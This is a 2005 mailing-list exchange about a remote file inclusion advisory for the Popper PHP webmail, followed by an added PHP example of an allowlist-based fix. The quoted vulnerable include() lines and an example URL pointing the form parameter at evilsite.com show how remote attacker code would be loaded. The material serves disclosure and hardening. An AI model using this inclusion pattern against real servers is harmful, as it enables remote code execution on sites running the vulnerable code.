Message-ID: <20050605232357.CC5BC42F3D@maja.zesoi.fer.hr>
Date: Mon Jun 6 00:24:11 2005
From: ljuranic at lss.hr (Leon Juranic)
Subject: Re: LSS.hr false positives. (correction)
Hi b0iler,
There is a problem with the original advisory on the security.lss.hr site. The vulnerable
PHP line itself is presented as an HTML tag, so it isn't visible within a browser.
That's why the rest of the advisory doesn't make any sense.
Here it is:
--------------
..
<?php
if(file_exists($form.".toolbar.inc.php")) {
include($form.".toolbar.inc.php");
}
?>
..
..
<?php include($form.".form.inc.php");?> <- HERE IT IS
..
--------------
I apologize for that mistake; we will fix it in a few hours.
> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to a remote code inclusion bug in the childwindow.inc.php script that can be
>>abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>> if(file_exists($form.".toolbar.inc.php")) {
>> include($form.".toolbar.inc.php");
>> }
>>?>
>
>file_exists() only works on local files; it does not work even with allow_url_fopen on. Even
>if the file_exists() check were not there, your description of how to exploit it is incorrect:
>
>>To exploit this vulnerability, an attacker has to put a script like test.form.inc.php on
>>the www.evilsite.com HTTP server, and call a URL like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php. It's quite
>obvious you did not even bother testing this before issuing the advisory.
>
Regards,
---------------------------------------
Leon Juranic, LSS Security
http://security.lss.hr
"Born under the lucky star magical,
but on this world generally tragical".
- Djole
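The unguarded include at the end of the snippet above, placed beside the hardened replacement a maintainer would write, as an added example that is neither Popper's code nor the advisory's; the forms directory and the allowed form names are assumptions:

```php
<?php
// Added example, not code from Popper or the LSS advisory.
// The vulnerable pattern quoted in the thread (register_globals era): $form comes
// straight from the request, so ?form=http://evilsite.com/test turns include() into
// a remote file inclusion. The file_exists() guard on the toolbar include does not
// cover the second include at all:
//
//   include($form.".form.inc.php");
//
// Hardened form: map the request value onto a fixed allowlist of local include files,
// so no request-controlled path or URL ever reaches include().
declare(strict_types=1);

// Assumed location and names of the *.form.inc.php files for this example.
const FORM_DIR = __DIR__ . '/forms';
const ALLOWED_FORMS = ['compose', 'reply', 'forward'];

/**
 * Return the absolute path of the include file for $name, or null if $name is not an
 * allowlisted form. Exact match only; the request value is never spliced into a path.
 */
function resolve_form_include(string $name): ?string
{
    if (!in_array($name, ALLOWED_FORMS, true)) {
        return null;
    }
    $base = realpath(FORM_DIR);
    $real = realpath(FORM_DIR . '/' . $name . '.form.inc.php');
    // Defence in depth: the resolved file must exist and still lie inside FORM_DIR.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$form = $_GET['form'] ?? 'compose';
$include = is_string($form) ? resolve_form_include($form) : null;
if ($include === null) {
    http_response_code(400);
    exit('unknown form');
}
// On current PHP additionally keep allow_url_include=Off in php.ini, so include()
// refuses http:// wrappers even if a bug like the one above slips through elsewhere.
include $include;
```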